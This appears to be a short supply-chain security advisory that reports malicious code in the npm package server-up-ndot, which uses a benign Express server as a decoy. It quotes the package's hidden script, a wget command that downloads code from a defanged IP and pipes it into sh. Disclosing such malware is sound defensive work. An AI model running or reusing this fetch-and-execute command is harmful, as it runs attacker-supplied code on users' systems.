LWA-2026-5100 confirmed malware

server-up-ndot@1.0.0

Malicious code in server-up-ndot (npm)

T1059.004 · Unix ShellT1105 · Ingress Tool Transfer

Analysis

Package ships a script named "installze" that executes wget -qO- 192[.]168[.]219[.]159:5000/js/app/1 | sh — downloading and running arbitrary code from the private IP 192[.]168[.]219[.]159 on port 5000. The main entry point index.js is a benign Express hello-world server acting as a decoy. The package also bundles a file (./package/1) that echoes "ndot" branding. The downloader is dormant under normal npm install (the script name is not a lifecycle hook), suggesting staged infrastructure.

analyzed by
Leitwacht
first seen
Jun 13, 2026, 05:47 PM
analyzed
Jun 13, 2026, 05:49 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.